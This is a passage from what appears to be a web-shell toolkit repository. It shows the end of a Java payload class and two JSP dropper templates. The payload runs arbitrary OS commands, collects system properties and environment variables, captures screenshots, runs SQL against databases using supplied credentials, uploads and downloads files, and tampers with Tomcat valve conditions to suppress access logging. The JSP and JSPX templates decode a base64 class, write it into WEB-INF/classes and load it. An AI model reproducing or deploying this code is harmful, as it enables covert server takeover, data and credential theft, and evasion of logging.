payload10.class$2) == null) { 789 | try { 790 | class$2 = (payload10.class$2 = Class.forName("java.lang.String")); 791 | } 792 | catch (ClassNotFoundException ex) { 793 | throw new NoClassDefFoundError(ex.getMessage()); 794 | } 795 | } 796 | parameterClass[n] = class$2; 797 | return this.getMethodAndInvoke(httpSession, methodName, parameterClass, new Object[] { keyString }); 798 | } 799 | return null; 800 | } 801 | 802 | public void setSessionAttribute( String keyString, Object value) { 803 | if (this.httpSession != null) { 804 | final Object httpSession = this.httpSession; 805 | final String methodName = "setAttribute"; 806 | final Class[] parameterClass = new Class[2]; 807 | final int n = 0; 808 | Class class$2; 809 | if ((class$2 = payload10.class$2) == null) { 810 | try { 811 | class$2 = (payload10.class$2 = Class.forName("java.lang.String")); 812 | } 813 | catch (ClassNotFoundException ex) { 814 | throw new NoClassDefFoundError(ex.getMessage()); 815 | } 816 | } 817 | parameterClass[n] = class$2; 818 | final int n2 = 1; 819 | Class class$3; 820 | if ((class$3 = payload10.class$5) == null) { 821 | try { 822 | class$3 = (payload10.class$5 = Class.forName("java.lang.Object")); 823 | } 824 | catch (ClassNotFoundException ex2) { 825 | throw new NoClassDefFoundError(ex2.getMessage()); 826 | } 827 | } 828 | parameterClass[n2] = class$3; 829 | this.getMethodAndInvoke(httpSession, methodName, parameterClass, new Object[] { keyString, value }); 830 | } 831 | } 832 | 833 | public byte[] execCommand() { 834 | final String argsCountStr = this.get("argsCount"); 835 | if (argsCountStr != null && argsCountStr.length() > 0) { 836 | try { 837 | Process process = null; 838 | final ArrayList argsList = new ArrayList(); 839 | final int argsCount = Integer.parseInt(argsCountStr); 840 | if (argsCount <= 0) { 841 | return "argsCount <=0".getBytes(); 842 | } 843 | for (int i = 0; i < argsCount; ++i) { 844 | final String val = this.get(String.format("arg-%d", new Integer(i))); 845 | if (val != null) { 846 | argsList.add(val); 847 | } 848 | } 849 | final String[] cmdarray = new String[argsList.size()]; 850 | for (int j = 0; j < argsList.size(); ++j) { 851 | cmdarray[j] = (String) argsList.get(j); 852 | } 853 | process = Runtime.getRuntime().exec((String[]) argsList.toArray(new String[0])); 854 | if (process == null) { 855 | return "Unable to start process".getBytes(); 856 | } 857 | final InputStream inputStream = process.getInputStream(); 858 | final InputStream errorInputStream = process.getErrorStream(); 859 | final ByteArrayOutputStream memStream = new ByteArrayOutputStream(1024); 860 | final byte[] buff = new byte[521]; 861 | int readNum = 0; 862 | if (inputStream != null) { 863 | while ((readNum = inputStream.read(buff)) > 0) { 864 | memStream.write(buff, 0, readNum); 865 | } 866 | } 867 | if (errorInputStream != null) { 868 | while ((readNum = errorInputStream.read(buff)) > 0) { 869 | memStream.write(buff, 0, readNum); 870 | } 871 | } 872 | return memStream.toByteArray(); 873 | } 874 | catch (Exception e) { 875 | return e.getMessage().getBytes(); 876 | } 877 | } 878 | return "No parameter argsCountStr".getBytes(); 879 | } 880 | 881 | public byte[] getBasicsInfo() { 882 | try { 883 | final Enumeration keys = System.getProperties().keys(); 884 | String basicsInfo = new String(); 885 | basicsInfo = String.valueOf(basicsInfo) + "FileRoot : " + this.listFileRoot() + "\n"; 886 | basicsInfo = String.valueOf(basicsInfo) + "CurrentDir : " + new File("").getAbsoluteFile() + "/" + "\n"; 887 | basicsInfo = String.valueOf(basicsInfo) + "CurrentUser : " + System.getProperty("user.name") + "\n"; 888 | basicsInfo = String.valueOf(basicsInfo) + "ProcessArch : " + System.getProperty("sun.arch.data.model") + "\n"; 889 | try { 890 | String tmpdir = System.getProperty("java.io.tmpdir"); 891 | final char lastChar = tmpdir.charAt(tmpdir.length() - 1); 892 | if (lastChar != '\\' && lastChar != '/') { 893 | tmpdir = String.valueOf(tmpdir) + File.separator; 894 | } 895 | basicsInfo = String.valueOf(basicsInfo) + "TempDirectory : " + tmpdir + "\n"; 896 | } 897 | catch (Exception ex) {} 898 | basicsInfo = String.valueOf(basicsInfo) + "DocBase : " + this.getDocBase() + "\n"; 899 | basicsInfo = String.valueOf(basicsInfo) + "RealFile : " + this.getRealPath() + "\n"; 900 | basicsInfo = String.valueOf(basicsInfo) + "servletRequest : " + ((this.servletRequest == null) ? "null" : (String.valueOf(String.valueOf(this.servletRequest.hashCode())) + "\n")); 901 | basicsInfo = String.valueOf(basicsInfo) + "servletContext : " + ((this.servletContext == null) ? "null" : (String.valueOf(String.valueOf(this.servletContext.hashCode())) + "\n")); 902 | basicsInfo = String.valueOf(basicsInfo) + "httpSession : " + ((this.httpSession == null) ? "null" : (String.valueOf(String.valueOf(this.httpSession.hashCode())) + "\n")); 903 | try { 904 | basicsInfo = String.valueOf(basicsInfo) + "OsInfo : " + String.format("os.name: %s os.version: %s os.arch: %s", System.getProperty("os.name"), System.getProperty("os.version"), System.getProperty("os.arch")) + "\n"; 905 | } 906 | catch (Exception e) { 907 | basicsInfo = String.valueOf(basicsInfo) + "OsInfo : " + e.getMessage() + "\n"; 908 | } 909 | basicsInfo = String.valueOf(basicsInfo) + "IPList : " + getLocalIPList() + "\n"; 910 | while (keys.hasMoreElements()) { 911 | final Object object = keys.nextElement(); 912 | if (object instanceof String) { 913 | final String key = (String)object; 914 | basicsInfo = String.valueOf(basicsInfo) + key + " : " + System.getProperty(key) + "\n"; 915 | } 916 | } 917 | final Map envMap = this.getEnv(); 918 | if (envMap != null) { 919 | Iterator iterator = envMap.keySet().iterator(); 920 | while (iterator.hasNext()) { 921 | String key = (String) iterator.next(); 922 | basicsInfo = String.valueOf(basicsInfo) + key + " : " + envMap.get(key) + "\n"; 923 | } 924 | } 925 | return basicsInfo.getBytes(); 926 | } 927 | catch (Exception e2) { 928 | return e2.getMessage().getBytes(); 929 | } 930 | } 931 | 932 | public byte[] screen() { 933 | try { 934 | final Robot robot = new Robot(); 935 | final BufferedImage as = robot.createScreenCapture(new Rectangle(Toolkit.getDefaultToolkit().getScreenSize().width, Toolkit.getDefaultToolkit().getScreenSize().height)); 936 | final ByteArrayOutputStream bs = new ByteArrayOutputStream(); 937 | ImageIO.write(as, "png", ImageIO.createImageOutputStream(bs)); 938 | final byte[] data = bs.toByteArray(); 939 | bs.close(); 940 | return data; 941 | } 942 | catch (Exception e) { 943 | return e.getMessage().getBytes(); 944 | } 945 | } 946 | 947 | public byte[] execSql() throws Exception { 948 | final String charset = this.get("dbCharset"); 949 | final String dbType = this.get("dbType"); 950 | final String dbHost = this.get("dbHost"); 951 | final String dbPort = this.get("dbPort"); 952 | final String dbUsername = this.get("dbUsername"); 953 | final String dbPassword = this.get("dbPassword"); 954 | final String execType = this.get("execType"); 955 | final String execSql = new String(this.getByteArray("execSql"), charset); 956 | if (dbType != null && dbHost != null && dbPort != null && dbUsername != null && dbPassword != null && execType != null && execSql != null) { 957 | try { 958 | try { 959 | Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver"); 960 | } 961 | catch (Exception ex) {} 962 | try { 963 | Class.forName("oracle.jdbc.driver.OracleDriver"); 964 | } 965 | catch (Exception e2) { 966 | try { 967 | Class.forName("oracle.jdbc.OracleDriver"); 968 | } 969 | catch (Exception ex2) {} 970 | } 971 | try { 972 | Class.forName("com.mysql.cj.jdbc.Driver"); 973 | } 974 | catch (Exception e2) { 975 | try { 976 | Class.forName("com.mysql.jdbc.Driver"); 977 | } 978 | catch (Exception ex3) {} 979 | } 980 | try { 981 | Class.forName("org.postgresql.Driver"); 982 | } 983 | catch (Exception ex4) {} 984 | try { 985 | Class.forName("org.sqlite.JDBC"); 986 | } 987 | catch (Exception ex5) {} 988 | String connectUrl = null; 989 | if ("mysql".equals(dbType)) { 990 | connectUrl = "jdbc:mysql://" + dbHost + ":" + dbPort + "/" + "?useSSL=false&serverTimezone=UTC&zeroDateTimeBehavior=convertToNull&noDatetimeStringSync=true&characterEncoding=utf-8"; 991 | } 992 | else if ("oracle".equals(dbType)) { 993 | connectUrl = "jdbc:oracle:thin:@" + dbHost + ":" + dbPort + ":orcl"; 994 | } 995 | else if ("sqlserver".equals(dbType)) { 996 | connectUrl = "jdbc:sqlserver://" + dbHost + ":" + dbPort + ";"; 997 | } 998 | else if ("postgresql".equals(dbType)) { 999 | connectUrl = "jdbc:postgresql://" + dbHost + ":" + dbPort + "/"; 1000 | } 1001 | else if ("sqlite".equals(dbType)) { 1002 | connectUrl = "jdbc:sqlite:" + dbHost; 1003 | } 1004 | if (dbHost.indexOf("jdbc:") != -1) { 1005 | connectUrl = dbHost; 1006 | } 1007 | if (connectUrl != null) { 1008 | try { 1009 | Connection dbConn = null; 1010 | try { 1011 | dbConn = getConnection(connectUrl, dbUsername, dbPassword); 1012 | } 1013 | catch (Exception ex6) {} 1014 | if (dbConn == null) { 1015 | dbConn = DriverManager.getConnection(connectUrl, dbUsername, dbPassword); 1016 | } 1017 | final Statement statement = dbConn.createStatement(); 1018 | if (execType.equals("select")) { 1019 | String data = "ok\n"; 1020 | final ResultSet resultSet = statement.executeQuery(execSql); 1021 | final ResultSetMetaData metaData = resultSet.getMetaData(); 1022 | final int columnNum = metaData.getColumnCount(); 1023 | for (int i = 0; i < columnNum; ++i) { 1024 | data = String.valueOf(data) + this.base64Encode(String.format("%s", metaData.getColumnName(i + 1))) + "\t"; 1025 | } 1026 | data = String.valueOf(data) + "\n"; 1027 | while (resultSet.next()) { 1028 | for (int i = 0; i < columnNum; ++i) { 1029 | data = String.valueOf(data) + this.base64Encode(String.format("%s", resultSet.getString(i + 1))) + "\t"; 1030 | } 1031 | data = String.valueOf(data) + "\n"; 1032 | } 1033 | resultSet.close(); 1034 | statement.close(); 1035 | dbConn.close(); 1036 | return data.getBytes(); 1037 | } 1038 | final int affectedNum = statement.executeUpdate(execSql); 1039 | statement.close(); 1040 | dbConn.close(); 1041 | return ("Query OK, " + affectedNum + " rows affected").getBytes(); 1042 | } 1043 | catch (Exception e) { 1044 | return e.getMessage().getBytes(); 1045 | } 1046 | } 1047 | return ("no " + dbType + " Dbtype").getBytes(); 1048 | } 1049 | catch (Exception e2) { 1050 | return e2.getMessage().getBytes(); 1051 | } 1052 | } 1053 | return "No parameter dbType,dbHost,dbPort,dbUsername,dbPassword,execType,execSql".getBytes(); 1054 | } 1055 | 1056 | public byte[] close() { 1057 | try { 1058 | if (this.httpSession != null) { 1059 | this.getMethodAndInvoke(this.httpSession, "invalidate", null, null); 1060 | } 1061 | return "ok".getBytes(); 1062 | } 1063 | catch (Exception e) { 1064 | return e.getMessage().getBytes(); 1065 | } 1066 | } 1067 | 1068 | public byte[] bigFileUpload() { 1069 | final String fileName = this.get("fileName"); 1070 | final byte[] fileContents = this.getByteArray("fileContents"); 1071 | final String position = this.get("position"); 1072 | try { 1073 | if (position == null) { 1074 | final FileOutputStream fileOutputStream = new FileOutputStream(fileName, true); 1075 | fileOutputStream.write(fileContents); 1076 | fileOutputStream.flush(); 1077 | fileOutputStream.close(); 1078 | } 1079 | else { 1080 | final RandomAccessFile fileOutputStream2 = new RandomAccessFile(fileName, "rw"); 1081 | fileOutputStream2.seek(Integer.parseInt(position)); 1082 | fileOutputStream2.write(fileContents); 1083 | fileOutputStream2.close(); 1084 | } 1085 | return "ok".getBytes(); 1086 | } 1087 | catch (Exception e) { 1088 | return String.format("Exception errMsg:%s", e.getMessage()).getBytes(); 1089 | } 1090 | } 1091 | 1092 | public byte[] bigFileDownload() { 1093 | final String fileName = this.get("fileName"); 1094 | final String mode = this.get("mode"); 1095 | final String readByteNumString = this.get("readByteNum"); 1096 | final String positionString = this.get("position"); 1097 | try { 1098 | if ("fileSize".equals(mode)) { 1099 | return String.valueOf(new File(fileName).length()).getBytes(); 1100 | } 1101 | if (!"read".equals(mode)) { 1102 | return "no mode".getBytes(); 1103 | } 1104 | final int position = Integer.valueOf(positionString); 1105 | final int readByteNum = Integer.valueOf(readByteNumString); 1106 | final byte[] readData = new byte[readByteNum]; 1107 | final FileInputStream fileInputStream = new FileInputStream(fileName); 1108 | fileInputStream.skip(position); 1109 | final int readNum = fileInputStream.read(readData); 1110 | fileInputStream.close(); 1111 | if (readNum == readData.length) { 1112 | return readData; 1113 | } 1114 | return copyOf(readData, readNum); 1115 | } 1116 | catch (Exception e) { 1117 | return String.format("Exception errMsg:%s", e.getMessage()).getBytes(); 1118 | } 1119 | } 1120 | 1121 | public static byte[] copyOf(final byte[] original, final int newLength) { 1122 | final byte[] arrayOfByte = new byte[newLength]; 1123 | System.arraycopy(original, 0, arrayOfByte, 0, Math.min(original.length, newLength)); 1124 | return arrayOfByte; 1125 | } 1126 | 1127 | public Map getEnv() { 1128 | try { 1129 | final int jreVersion = Integer.parseInt(System.getProperty("java.version").substring(2, 3)); 1130 | if (jreVersion >= 5) { 1131 | try { 1132 | Class class$6; 1133 | if ((class$6 = payload10.class$6) == null) { 1134 | try { 1135 | class$6 = (payload10.class$6 = Class.forName("java.lang.System")); 1136 | } 1137 | catch (ClassNotFoundException ex) { 1138 | throw new NoClassDefFoundError(ex.getMessage()); 1139 | } 1140 | } 1141 | final Method method = class$6.getMethod("getenv", (Class[])new Class[0]); 1142 | if (method != null) { 1143 | final Class returnType = method.getReturnType(); 1144 | Class class$7; 1145 | if ((class$7 = payload10.class$7) == null) { 1146 | try { 1147 | class$7 = (payload10.class$7 = Class.forName("java.util.Map")); 1148 | } 1149 | catch (ClassNotFoundException ex2) { 1150 | throw new NoClassDefFoundError(ex2.getMessage()); 1151 | } 1152 | } 1153 | if (returnType.isAssignableFrom(class$7)) { 1154 | return (Map)method.invoke(null, (Object[])null); 1155 | } 1156 | } 1157 | return null; 1158 | } 1159 | catch (Exception e) { 1160 | return null; 1161 | } 1162 | } 1163 | return null; 1164 | } 1165 | catch (Exception e2) { 1166 | return null; 1167 | } 1168 | } 1169 | 1170 | public String getDocBase() { 1171 | try { 1172 | return this.getRealPath(); 1173 | } 1174 | catch (Exception e) { 1175 | return e.getMessage(); 1176 | } 1177 | } 1178 | 1179 | public static Connection getConnection(final String url, final String userName, final String password) { 1180 | Connection connection = null; 1181 | try { 1182 | Class class$8; 1183 | if ((class$8 = payload10.class$8) == null) { 1184 | try { 1185 | class$8 = (payload10.class$8 = Class.forName("java.sql.DriverManager")); 1186 | } 1187 | catch (ClassNotFoundException ex) { 1188 | throw new NoClassDefFoundError(ex.getMessage()); 1189 | } 1190 | } 1191 | final Field[] fields = class$8.getDeclaredFields(); 1192 | Field field = null; 1193 | for (int i = 0; i < fields.length; ++i) { 1194 | field = fields[i]; 1195 | if (field.getName().indexOf("rivers") != -1) { 1196 | Class class$9; 1197 | if ((class$9 = payload10.class$9) == null) { 1198 | try { 1199 | class$9 = (payload10.class$9 = Class.forName("java.util.List")); 1200 | } 1201 | catch (ClassNotFoundException ex2) { 1202 | throw new NoClassDefFoundError(ex2.getMessage()); 1203 | } 1204 | } 1205 | if (class$9.isAssignableFrom(field.getType())) { 1206 | break; 1207 | } 1208 | } 1209 | field = null; 1210 | } 1211 | if (field != null) { 1212 | field.setAccessible(true); 1213 | final List drivers = (List)field.get(null); 1214 | final Iterator iterator = drivers.iterator(); 1215 | while (iterator.hasNext()) { 1216 | if (connection != null) { 1217 | break; 1218 | } 1219 | try { 1220 | final Object object = iterator.next(); 1221 | Driver driver = null; 1222 | Class class$10; 1223 | if ((class$10 = payload10.class$10) == null) { 1224 | try { 1225 | class$10 = (payload10.class$10 = Class.forName("java.sql.Driver")); 1226 | } 1227 | catch (ClassNotFoundException ex3) { 1228 | throw new NoClassDefFoundError(ex3.getMessage()); 1229 | } 1230 | } 1231 | if (!class$10.isAssignableFrom(object.getClass())) { 1232 | final Field[] driverInfos = object.getClass().getDeclaredFields(); 1233 | for (int j = 0; j < driverInfos.length; ++j) { 1234 | Class class$11; 1235 | if ((class$11 = payload10.class$10) == null) { 1236 | try { 1237 | class$11 = (payload10.class$10 = Class.forName("java.sql.Driver")); 1238 | } 1239 | catch (ClassNotFoundException ex4) { 1240 | throw new NoClassDefFoundError(ex4.getMessage()); 1241 | } 1242 | } 1243 | if (class$11.isAssignableFrom(driverInfos[j].getType())) { 1244 | driverInfos[j].setAccessible(true); 1245 | driver = (Driver)driverInfos[j].get(object); 1246 | break; 1247 | } 1248 | } 1249 | } 1250 | if (driver == null) { 1251 | continue; 1252 | } 1253 | final Properties properties = new Properties(); 1254 | if (userName != null) { 1255 | properties.put("user", userName); 1256 | } 1257 | if (password != null) { 1258 | properties.put("password", password); 1259 | } 1260 | connection = driver.connect(url, properties); 1261 | } 1262 | catch (Exception ex5) {} 1263 | } 1264 | } 1265 | } 1266 | catch (Exception ex6) {} 1267 | return connection; 1268 | } 1269 | 1270 | public static String getLocalIPList() { 1271 | final List ipList = new ArrayList(); 1272 | try { 1273 | final Enumeration networkInterfaces = NetworkInterface.getNetworkInterfaces(); 1274 | while (networkInterfaces.hasMoreElements()) { 1275 | final NetworkInterface networkInterface = (NetworkInterface) networkInterfaces.nextElement(); 1276 | final Enumeration inetAddresses = networkInterface.getInetAddresses(); 1277 | while (inetAddresses.hasMoreElements()) { 1278 | final InetAddress inetAddress = (InetAddress) inetAddresses.nextElement(); 1279 | if (inetAddress != null) { 1280 | final String ip = inetAddress.getHostAddress(); 1281 | ipList.add(ip); 1282 | } 1283 | } 1284 | } 1285 | } 1286 | catch (Exception ex) {} 1287 | return Arrays.toString(ipList.toArray()); 1288 | } 1289 | 1290 | public String getRealPath() { 1291 | try { 1292 | if (this.servletContext == null) { 1293 | return "servletContext is Null"; 1294 | } 1295 | final Class class1 = this.servletContext.getClass(); 1296 | final String methodName = "getRealPath"; 1297 | final Class[] parameters = { null }; 1298 | final int n = 0; 1299 | Class class$2; 1300 | if ((class$2 = payload10.class$2) == null) { 1301 | try { 1302 | class$2 = (payload10.class$2 = Class.forName("java.lang.String")); 1303 | } 1304 | catch (ClassNotFoundException ex) { 1305 | throw new NoClassDefFoundError(ex.getMessage()); 1306 | } 1307 | } 1308 | parameters[n] = class$2; 1309 | final Method getRealPathMethod = this.getMethodByClass(class1, methodName, parameters); 1310 | if (getRealPathMethod == null) { 1311 | return "no method getRealPathMethod"; 1312 | } 1313 | final Object retObject = getRealPathMethod.invoke(this.servletContext, "/"); 1314 | if (retObject != null) { 1315 | return retObject.toString(); 1316 | } 1317 | return "Null"; 1318 | } 1319 | catch (Exception e) { 1320 | return e.getMessage(); 1321 | } 1322 | } 1323 | 1324 | public void deleteFiles(final File f) throws Exception { 1325 | if (f.isDirectory()) { 1326 | final File[] x = f.listFiles(); 1327 | for (int i = 0; i < x.length; ++i) { 1328 | final File fs = x[i]; 1329 | this.deleteFiles(fs); 1330 | } 1331 | } 1332 | f.delete(); 1333 | } 1334 | 1335 | Object invoke(final Object obj, final String methodName, final Object[] parameters) { 1336 | try { 1337 | final ArrayList classes = new ArrayList(); 1338 | if (parameters != null) { 1339 | for (int i = 0; i < parameters.length; ++i) { 1340 | final Object o1 = parameters[i]; 1341 | if (o1 != null) { 1342 | classes.add(o1.getClass()); 1343 | } 1344 | else { 1345 | classes.add(null); 1346 | } 1347 | } 1348 | } 1349 | final Method method = this.getMethodByClass(obj.getClass(), methodName, (Class[]) classes.toArray(new Class[0])); 1350 | return method.invoke(obj, parameters); 1351 | } 1352 | catch (Exception ex) { 1353 | return null; 1354 | } 1355 | } 1356 | 1357 | Object getMethodAndInvoke(final Object obj, final String methodName, final Class[] parameterClass, final Object[] parameters) { 1358 | try { 1359 | final Method method = this.getMethodByClass(obj.getClass(), methodName, parameterClass); 1360 | if (method != null) { 1361 | return method.invoke(obj, parameters); 1362 | } 1363 | } 1364 | catch (Exception ex) {} 1365 | return null; 1366 | } 1367 | 1368 | Method getMethodByClass(Class cs, final String methodName, final Class[] parameters) { 1369 | Method method = null; 1370 | while (cs != null) { 1371 | try { 1372 | method = cs.getDeclaredMethod(methodName, (Class[])parameters); 1373 | method.setAccessible(true); 1374 | cs = null; 1375 | } 1376 | catch (Exception e) { 1377 | cs = cs.getSuperclass(); 1378 | } 1379 | } 1380 | return method; 1381 | } 1382 | 1383 | public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { 1384 | Field f = null; 1385 | if (obj instanceof Field) { 1386 | f = (Field)obj; 1387 | } 1388 | else { 1389 | final Method method = null; 1390 | Class cs = obj.getClass(); 1391 | while (cs != null) { 1392 | try { 1393 | f = cs.getDeclaredField(fieldName); 1394 | cs = null; 1395 | } 1396 | catch (Exception e) { 1397 | cs = cs.getSuperclass(); 1398 | } 1399 | } 1400 | } 1401 | f.setAccessible(true); 1402 | return f.get(obj); 1403 | } 1404 | 1405 | private void noLog(final Object servletContext) { 1406 | try { 1407 | final Object applicationContext = getFieldValue(servletContext, "context"); 1408 | Object container = getFieldValue(applicationContext, "context"); 1409 | final ArrayList arrayList = new ArrayList(); 1410 | while (container != null) { 1411 | arrayList.add(container); 1412 | container = this.invoke(container, "getParent", null); 1413 | } 1414 | for (int i = 0; i < arrayList.size(); ++i) { 1415 | try { 1416 | final Object pipeline = this.invoke(arrayList.get(i), "getPipeline", null); 1417 | if (pipeline != null) { 1418 | Object valve = this.invoke(pipeline, "getFirst", null); 1419 | while (valve != null) { 1420 | if (this.getMethodByClass(valve.getClass(), "getCondition", null) != null) { 1421 | final Class class1 = valve.getClass(); 1422 | final String methodName = "setCondition"; 1423 | final Class[] parameters = { null }; 1424 | final int n = 0; 1425 | Class class$2; 1426 | if ((class$2 = payload10.class$2) == null) { 1427 | try { 1428 | class$2 = (payload10.class$2 = Class.forName("java.lang.String")); 1429 | } 1430 | catch (ClassNotFoundException ex) { 1431 | throw new NoClassDefFoundError(ex.getMessage()); 1432 | } 1433 | } 1434 | parameters[n] = class$2; 1435 | if (this.getMethodByClass(class1, methodName, parameters) != null) { 1436 | String condition = (String)this.invoke(valve, "getCondition", new Object[0]); 1437 | condition = ((condition == null) ? "FuckLog" : condition); 1438 | this.invoke(valve, "setCondition", new Object[] { condition }); 1439 | final Class class2 = this.servletRequest.getClass(); 1440 | final String methodName2 = "setAttribute"; 1441 | final Class[] parameters2 = new Class[2]; 1442 | final int n2 = 0; 1443 | Class class$3; 1444 | if ((class$3 = payload10.class$2) == null) { 1445 | try { 1446 | class$3 = (payload10.class$2 = Class.forName("java.lang.String")); 1447 | } 1448 | catch (ClassNotFoundException ex2) { 1449 | throw new NoClassDefFoundError(ex2.getMessage()); 1450 | } 1451 | } 1452 | parameters2[n2] = class$3; 1453 | final int n3 = 1; 1454 | Class class$4; 1455 | if ((class$4 = payload10.class$2) == null) { 1456 | try { 1457 | class$4 = (payload10.class$2 = Class.forName("java.lang.String")); 1458 | } 1459 | catch (ClassNotFoundException ex3) { 1460 | throw new NoClassDefFoundError(ex3.getMessage()); 1461 | } 1462 | } 1463 | parameters2[n3] = class$4; 1464 | final Method setAttributeMethod = this.getMethodByClass(class2, methodName2, parameters2); 1465 | setAttributeMethod.invoke(condition, condition); 1466 | valve = this.invoke(valve, "getNext", null); 1467 | continue; 1468 | } 1469 | } 1470 | if (Class.forName("org.apache.catalina.Valve", false, applicationContext.getClass().getClassLoader()).isAssignableFrom(valve.getClass())) { 1471 | valve = this.invoke(valve, "getNext", null); 1472 | } 1473 | else { 1474 | valve = null; 1475 | } 1476 | } 1477 | } 1478 | } 1479 | catch (Exception ex4) {} 1480 | } 1481 | } 1482 | catch (Exception ex5) {} 1483 | } 1484 | 1485 | private static Class getClass(final String name) { 1486 | try { 1487 | return Class.forName(name); 1488 | } 1489 | catch (Exception e) { 1490 | return null; 1491 | } 1492 | } 1493 | 1494 | public static int bytesToInt(final byte[] bytes) { 1495 | final int i = (bytes[0] & 0xFF) | (bytes[1] & 0xFF) << 8 | (bytes[2] & 0xFF) << 16 | (bytes[3] & 0xFF) << 24; 1496 | return i; 1497 | } 1498 | 1499 | public String base64Encode(final String data) { 1500 | return base64Encode(data.getBytes()); 1501 | } 1502 | 1503 | public static String base64Encode(final byte[] src) { 1504 | final int off = 0; 1505 | final int end = src.length; 1506 | final byte[] dst = new byte[4 * ((src.length + 2) / 3)]; 1507 | final int linemax = -1; 1508 | final boolean doPadding = true; 1509 | final char[] base64 = payload10.toBase64; 1510 | int sp = off; 1511 | int slen = (end - off) / 3 * 3; 1512 | final int sl = off + slen; 1513 | if (linemax > 0 && slen > linemax / 4 * 3) { 1514 | slen = linemax / 4 * 3; 1515 | } 1516 | int dp = 0; 1517 | while (sp < sl) { 1518 | final int sl2 = Math.min(sp + slen, sl); 1519 | int bits; 1520 | for (int sp2 = sp, dp2 = dp; sp2 < sl2; bits = ((src[sp2++] & 0xFF) << 16 | (src[sp2++] & 0xFF) << 8 | (src[sp2++] & 0xFF)), dst[dp2++] = (byte)base64[bits >>> 18 & 0x3F], dst[dp2++] = (byte)base64[bits >>> 12 & 0x3F], dst[dp2++] = (byte)base64[bits >>> 6 & 0x3F], dst[dp2++] = (byte)base64[bits & 0x3F]) {} 1521 | final int dlen = (sl2 - sp) / 3 * 4; 1522 | dp += dlen; 1523 | sp = sl2; 1524 | } 1525 | if (sp < end) { 1526 | final int b0 = src[sp++] & 0xFF; 1527 | dst[dp++] = (byte)base64[b0 >> 2]; 1528 | if (sp == end) { 1529 | dst[dp++] = (byte)base64[b0 << 4 & 0x3F]; 1530 | if (doPadding) { 1531 | dst[dp++] = 61; 1532 | dst[dp++] = 61; 1533 | } 1534 | } 1535 | else { 1536 | final int b2 = src[sp++] & 0xFF; 1537 | dst[dp++] = (byte)base64[(b0 << 4 & 0x3F) | b2 >> 4]; 1538 | dst[dp++] = (byte)base64[b2 << 2 & 0x3F]; 1539 | if (doPadding) { 1540 | dst[dp++] = 61; 1541 | } 1542 | } 1543 | } 1544 | return new String(dst); 1545 | } 1546 | 1547 | public static byte[] base64Decode(final String base64Str) { 1548 | if (base64Str.length() == 0) { 1549 | return new byte[0]; 1550 | } 1551 | final byte[] src = base64Str.getBytes(); 1552 | int sp = 0; 1553 | final int sl = src.length; 1554 | int paddings = 0; 1555 | final int len = sl - sp; 1556 | if (src[sl - 1] == 61) { 1557 | ++paddings; 1558 | if (src[sl - 2] == 61) { 1559 | ++paddings; 1560 | } 1561 | } 1562 | if (paddings == 0 && (len & 0x3) != 0x0) { 1563 | paddings = 4 - (len & 0x3); 1564 | } 1565 | byte[] dst = new byte[3 * ((len + 3) / 4) - paddings]; 1566 | final int[] base64 = new int[256]; 1567 | Arrays.fill(base64, -1); 1568 | for (int i = 0; i < payload10.toBase64.length; ++i) { 1569 | base64[payload10.toBase64[i]] = i; 1570 | } 1571 | base64[61] = -2; 1572 | int dp = 0; 1573 | int bits = 0; 1574 | int shiftto = 18; 1575 | while (sp < sl) { 1576 | int b = src[sp++] & 0xFF; 1577 | if ((b = base64[b]) < 0 && b == -2) { 1578 | if ((shiftto == 6 && (sp == sl || src[sp++] != 61)) || shiftto == 18) { 1579 | throw new IllegalArgumentException("Input byte array has wrong 4-byte ending unit"); 1580 | } 1581 | break; 1582 | } 1583 | else { 1584 | bits |= b << shiftto; 1585 | shiftto -= 6; 1586 | if (shiftto >= 0) { 1587 | continue; 1588 | } 1589 | dst[dp++] = (byte)(bits >> 16); 1590 | dst[dp++] = (byte)(bits >> 8); 1591 | dst[dp++] = (byte)bits; 1592 | shiftto = 18; 1593 | bits = 0; 1594 | } 1595 | } 1596 | if (shiftto == 6) { 1597 | dst[dp++] = (byte)(bits >> 16); 1598 | } 1599 | else if (shiftto == 0) { 1600 | dst[dp++] = (byte)(bits >> 16); 1601 | dst[dp++] = (byte)(bits >> 8); 1602 | } 1603 | else if (shiftto == 12) { 1604 | throw new IllegalArgumentException("Last unit does not have enough valid bits"); 1605 | } 1606 | if (dp != dst.length) { 1607 | final byte[] arrayOfByte = new byte[dp]; 1608 | System.arraycopy(dst, 0, arrayOfByte, 0, Math.min(dst.length, dp)); 1609 | dst = arrayOfByte; 1610 | } 1611 | return dst; 1612 | } 1613 | } 1614 | -------------------------------------------------------------------------------- /templates/shell.jsp: -------------------------------------------------------------------------------- 1 | <% 2 | String className = "shellName"; 3 | String code = "shellCode"; 4 | byte[] bytes = java.util.Base64.getDecoder().decode(code); 5 | java.io.File file = new java.io.File(request.getServletContext().getRealPath("/") + "WEB-INF/classes"); 6 | file.mkdirs(); 7 | java.nio.file.Files.write(java.nio.file.Paths.get(file.getAbsolutePath() + "/" + className + ".class"),bytes); 8 | Class.forName(className).newInstance().equals(new Object[]{request,response,session}); 9 | %> -------------------------------------------------------------------------------- /templates/shell.jspx: -------------------------------------------------------------------------------- 1 | 2 | 3 | String className = "payload"; 4 | String code = "shellCode"; 5 | byte[] bytes = java.util.Base64.getDecoder().decode(code); 6 | java.io.File file = new java.io.File(request.getServletContext().getRealPath("/") + "WEB-INF/classes"); 7 | file.mkdirs(); 8 | java.nio.file.Files.write(java.nio.file.Paths.get(file.getAbsolutePath() + "/" + className + ".class"),bytes); 9 | Class.forName(className).newInstance().equals(new Object[]{request,response,session}); 10 | 11 | --------------------------------------------------------------------------------